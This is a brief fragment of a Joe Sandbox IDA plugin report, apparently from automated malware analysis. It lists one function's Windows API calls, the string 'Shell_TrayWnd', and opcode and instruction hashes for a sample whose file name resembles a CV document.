                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                            • String ID: Shell_TrayWnd
                                                                                            • API String ID: 529655941-2988720461
                                                                                            • Opcode ID: 2261e5219b0e7254353ce1a3d4a830396135c688396513205bce7a2ca008c00f
                                                                                            • Instruction ID: cf8116a2b102ccd2acd7e6cad85eb27c131cc47d942d3376252dad94c56acf9e
                                                                                            • Opcode Fuzzy Hash: 2261e5219b0e7254353ce1a3d4a830396135c688396513205bce7a2ca008c00f
                                                                                            • Instruction Fuzzy Hash: 88D012357C5314BBF6646770AC0BFC67A289B19B11F114915B789EE1E0CAE4F980C764